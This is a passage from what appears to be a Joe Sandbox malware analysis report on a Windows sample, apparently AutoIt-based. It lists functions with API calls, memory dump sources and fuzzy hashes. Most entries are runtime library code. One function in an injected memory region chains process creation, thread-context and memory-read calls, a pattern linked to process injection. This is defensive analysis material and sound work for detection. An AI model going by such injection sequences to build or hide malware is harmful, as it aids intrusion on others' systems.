__NMSG_WRITE.LIBCMT ref: 0060573A

Part of subcall function 0060A1C8: GetModuleFileNameW.KERNEL32(00000000,006A33BA,00000104,?,00000001,00000000), ref: 0060A25A
Part of subcall function 0060A1C8: ___crtMessageBoxW.LIBCMT ref: 0060A308

Part of subcall function 0060309F: ___crtCorExitProcess.LIBCMT ref: 006030A5
Part of subcall function 0060309F: ExitProcess.KERNEL32 ref: 006030AE

Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28

RtlAllocateHeap.NTDLL(00F40000,00000000,00000001,00000000,?,?,?,00600DD3,?), ref: 0060575F

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 69dfeecf236e8324e4ba3d205e7c537539c5e7ec2c2af0cd3b9b39fc65f80938
Instruction ID: 08e8460e200f35a1e888f7b34553fe23518f1a71abf30b87589c4a26afe310c2
Opcode Fuzzy Hash: 69dfeecf236e8324e4ba3d205e7c537539c5e7ec2c2af0cd3b9b39fc65f80938
Instruction Fuzzy Hash: AC01C0312C0B12DAD65C6774AC82A6B738B8B82762F10043AF4069B3C1DEB49D016A65

Function 006498A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00649548,?,?,?,?,?,00000004), ref: 006498BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00649548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006498D1
CloseHandle.KERNEL32(00000000,?,00649548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006498D8

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a241cf019be0b41e35c20d12052098070c612fd9198be72d60d64dd33113bfc4
Instruction ID: 63b974e199a50e6e7391e7eb4280ffcf6bb904fc610f34b60773785be7d2f25a
Opcode Fuzzy Hash: a241cf019be0b41e35c20d12052098070c612fd9198be72d60d64dd33113bfc4
Instruction Fuzzy Hash: 58E08632181214BBD7211B54FC09FCA7B5AAB067A0F104220FB14791E087F1151197D8

Function 00648D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00648D1B

Part of subcall function 00602D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00609A24), ref: 00602D69
Part of subcall function 00602D55: GetLastError.KERNEL32(00000000,?,00609A24), ref: 00602D7B

_free.LIBCMT ref: 00648D2C
_free.LIBCMT ref: 00648D3E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: bf43393c38e9995c5bd6616b869ed0a1b4f6349af650d555ea4452d8f0bb87c9
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 4AE012A1A426124ACB68A6B8B944AD713DE8F9C752754091DF40DD72C6CE64FC428128

Function 005EA9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0061FC01

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: ba605306f241fda11ccb4ecf6cd2ed55bcfd233584bbe826663ccf106f49f9e4
Instruction ID: e3e82d5e0fddaf1f967973d141ba087a3aed9592bae2be7d0bb42aeb118e1809
Opcode Fuzzy Hash: ba605306f241fda11ccb4ecf6cd2ed55bcfd233584bbe826663ccf106f49f9e4
Instruction Fuzzy Hash: D5225B74508381DFD728DF25C494A6ABBE2BF84304F15896DF89A9B362D731EC45CB82

Function 0118A1A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0118A202

Strings

D, xrefs: 0118A1BC

Memory Dump Source

Source File: 00000000.00000002.2153550705.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_C5JLkBS1CX.jbxd

Similarity

API ID: CreateProcess
String ID: D
API String ID: 963392458-2746444292
Opcode ID: 6cb96521d7c40653040d1dd33bb025be60ddcfc4f79d8507ccbbce5ff7b1491f
Instruction ID: 8f4ba80ddde5d4d9cd90f0027f19b2945236ca009a59cbfe498f0a8dfc4ea5ff
Opcode Fuzzy Hash: 6cb96521d7c40653040d1dd33bb025be60ddcfc4f79d8507ccbbce5ff7b1491f
Instruction Fuzzy Hash: 5601FF71940218ABDB24EBE0DC49FEE7779AF54701F40C50AAA15AB180EB74A6088B61

Function 01189115 Relevance: 3.4, APIs: 2, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01189945
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01189969
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0118998B
TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01189C94

Memory Dump Source

Source File: 00000000.00000002.2153550705.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_C5JLkBS1CX.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
String ID:
API String ID: 572931308-0
Opcode ID: 0c26ce5ed657937ab7cef85eaaffec4c201bc4c0441aa9bb0c46e3760ea72e56
Instruction ID: bbd9c0b52309b30f95d68b299a1e432869d125635faaaa9422935d8e1ecd0fb0
Opcode Fuzzy Hash: 0c26ce5ed657937ab7cef85eaaffec4c201bc4c0441aa9bb0c46e3760ea72e56
Instruction Fuzzy Hash: 8412CF24E14658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A

Function 005E7A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005E7AAB
_memmove.LIBCMT ref: 005E7B16

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
Instruction ID: 4a0493cfc7f4d8cddbc4468679d2b1725caa52ab6814c651780b77657658b518
Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
Instruction Fuzzy Hash: 1E31B8B160464AAFC708DF69C8D1E69F7A9FF48310B15862DE559CB391EB30E950CB90

Function 005E47D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 005E4834

Part of subcall function 0060336C: __lock.LIBCMT ref: 00603372
Part of subcall function 0060336C: DecodePointer.KERNEL32(00000001,?,005E4849,00637C74), ref: 0060337E
Part of subcall function 0060336C: EncodePointer.KERNEL32(?,?,005E4849,00637C74), ref: 00603389

Part of subcall function 005E48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 005E4915
Part of subcall function 005E48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005E492A

Part of subcall function 005E3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005E3B68
Part of subcall function 005E3B3A: IsDebuggerPresent.KERNEL32 ref: 005E3B7A
Part of subcall function 005E3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,006A52F8,006A52E0,?,?), ref: 005E3BEB
Part of subcall function 005E3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 005E3C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 005E4874

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 6425b3b38f50d0b0d5ffc9f875ee19cd9037f685ff49e8818c9e58f4e2fa2dad
Instruction ID: 8a4a9b4d87b05c8f1f1cd9e1a8d91753ed8bc49e50030399a80a689adbcbd1d0
Opcode Fuzzy Hash: 6425b3b38f50d0b0d5ffc9f875ee19cd9037f685ff49e8818c9e58f4e2fa2dad
Instruction Fuzzy Hash: C7118E719083919FC704EF2AE84990ABFE9FB89750F10951EF085832B1DBB0A644CF92

Function 00600DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0060571C: __FF_MSGBANNER.LIBCMT ref: 00605733
Part of subcall function 0060571C: __NMSG_WRITE.LIBCMT ref: 0060573A
Part of subcall function 0060571C: RtlAllocateHeap.NTDLL(00F40000,00000000,00000001,00000000,?,?,?,00600DD3,?), ref: 0060575F

std::exception::exception.LIBCMT ref: 00600DEC
__CxxThrowException@8.LIBCMT ref: 00600E01

Part of subcall function 0060859B: RaiseException.KERNEL32(?,?,?,00699E78,00000000,?,?,?,?,00600E06,?,00699E78,?,00000001), ref: 006085F0

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 26ed840914ae4076d103801ae3759fa4283b8e3f3e0d48bdbe074f1e2594cd1b
Instruction ID: 8852f0fd74d927bc0ff623ea2fc1ce018b69f1db4da451c8982b67147459c9d7
Opcode Fuzzy Hash: 26ed840914ae4076d103801ae3759fa4283b8e3f3e0d48bdbe074f1e2594cd1b
Instruction Fuzzy Hash: 13F0A97158031E66DB18EE98EC11ADF7BAEDF01311F10441EF948A66C1DF709E50D5E5

Function 006055FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0060562C
__lock_file.LIBCMT ref: 0060564D

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: c2e1c7bd9b3c4bcbdec7c46200fa8086128294bf112361fafc4a20c43b12e243
Instruction ID: fc11b079bd14801008f864dce7557c5d4a62291525062dc5595fa633c1494cbe
Opcode Fuzzy Hash: c2e1c7bd9b3c4bcbdec7c46200fa8086128294bf112361fafc4a20c43b12e243
Instruction Fuzzy Hash: 6201D871880604EFCF55AF68CC029DF7B63AF51321F444119F4141B2E1DB328911DF95

Function 006053A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28

__lock_file.LIBCMT ref: 006053EB

Part of subcall function 00606C11: __lock.LIBCMT ref: 00606C34

__fclose_nolock.LIBCMT ref: 006053F6

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 5864376b640db56201572ccb78a25a685146a65f3799eeff3f47e0bef92dccfb
Instruction ID: 62ef55075ed653b9515469fe05885b3a0df2cd5a0435ea0054c386d75dcf93b3
Opcode Fuzzy Hash: 5864376b640db56201572ccb78a25a685146a65f3799eeff3f47e0bef92dccfb
Instruction Fuzzy Hash: EFF09631880A049EDB5CBB6598027AF76E26F41374F25820CA465AB1C1DBBC89415F69

Function 00600C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00600CB7

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 65c7426d6053b9483c7ce4e321af8debd14d6724be661298eee7b7fd9577bf41
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 6731B574A401059BE71CDF58C484AAAF7A6FB59300F6887A5E80ACB395D731EDC1DBC0

Function 0061FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0061FCB7

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d76126b6271b51d1fd70d5e5d1832b05b96c7e08e4008691387fbdf7899b78a3
Instruction ID: 4ebb5534ecc5fc93e9b3b7d75b7409f3f52bf20f97a0b33c350e75615e65e598
Opcode Fuzzy Hash: d76126b6271b51d1fd70d5e5d1832b05b96c7e08e4008691387fbdf7899b78a3
Instruction Fuzzy Hash: F24116749043519FDB18DF25C444B1ABBE1BF85318F1988ACE8998B362C731EC45CF52

Function 005E7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005E7BB3

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d736eb4b12a5ea1baa2c431ae8dec84721470949aeeaee0b894fa74c4b1786fc
Instruction ID: e035d696b18014805ec61009a5971b7422a4960777325af4516c376c6799b323
Opcode Fuzzy Hash: d736eb4b12a5ea1baa2c431ae8dec84721470949aeeaee0b894fa74c4b1786fc
Instruction Fuzzy Hash: 66214872A04A0DEBDB188F16EC417AA7FBAFF18750F24846EE896C5090EB31C0D0D785

Function 006006FE Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9546d7541e9b677185796895f25b16a34aa89b01d9ada589ebc4197cd3166c3c
Instruction ID: 0b36d608bb678d0e42e8ea380a5fe304d50a6acba802300ab9013529a86741c5
Opcode Fuzzy Hash: 9546d7541e9b677185796895f25b16a34aa89b01d9ada589ebc4197cd3166c3c
Instruction Fuzzy Hash: 2D21F8390453816FE7325B74E8426D6BFA5FF42320F2584AFE8448B841F6708D4687A5

Function 005E4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 005E4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 005E4BEF

Part of subcall function 0060525B: __wfsopen.LIBCMT ref: 00605266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005E4E0F

Part of subcall function 005E4B6A: FreeLibrary.KERNEL32(00000000), ref: 005E4BA4

Part of subcall function 005E4C70: _memmove.LIBCMT ref: 005E4CBA

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: e093f7cb983f4dc1dab18942cf9c832c7c5fc494fc8836bf87139d8dcbd10cc6
Instruction ID: e1d284feb6025309d08cf315c09fa63ceddc2bbc55e3f55756437b12cafa60a7
Opcode Fuzzy Hash: e093f7cb983f4dc1dab18942cf9c832c7c5fc494fc8836bf87139d8dcbd10cc6
Instruction Fuzzy Hash: FB11E731600246ABCF18AF71C81AFAE7BADBF84710F10882DF581A7181DB719E009F51

Function 0061FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0061FD91

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 437ba7cd49ea93e390438c97e59e09c0ab50482d44a27a251ee2d60acad7373b
Instruction ID: 850c7479b517688083a7f22b3a5aac3a9fb8a4e005fd0fb91a319a7fb0b76044
Opcode Fuzzy Hash: 437ba7cd49ea93e390438c97e59e09c0ab50482d44a27a251ee2d60acad7373b
Instruction Fuzzy Hash: BF2102B4908342DFDB18DF24C844A2ABBE1BF88314F15896CF99A57762D731E805CB92

Function 00604863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 006048A6

Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 3ed0f91d0682690af5d9e4f969f9e60b80b474dd81712d5b5fa076559278916b
Instruction ID: 7983979a5e1ffca6861b56cc3b8240a56b63a7e3643b3e311da8a36c761abe72
Opcode Fuzzy Hash: 3ed0f91d0682690af5d9e4f969f9e60b80b474dd81712d5b5fa076559278916b
Instruction Fuzzy Hash: 61F0D171880604EFDF69AF6488057DF36A2AF00320F058818B5209B1C1CF78C951DB55

Function 005E4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,006A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005E4E7E

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 851c340194271ad04d652cdd95d139620104096cb833af19eaf4395c57b22e38
Instruction ID: deacc7d422d3770a4178ceabdb6c5fcb9b903bac2050807c011890633c493fe4
Opcode Fuzzy Hash: 851c340194271ad04d652cdd95d139620104096cb833af19eaf4395c57b22e38
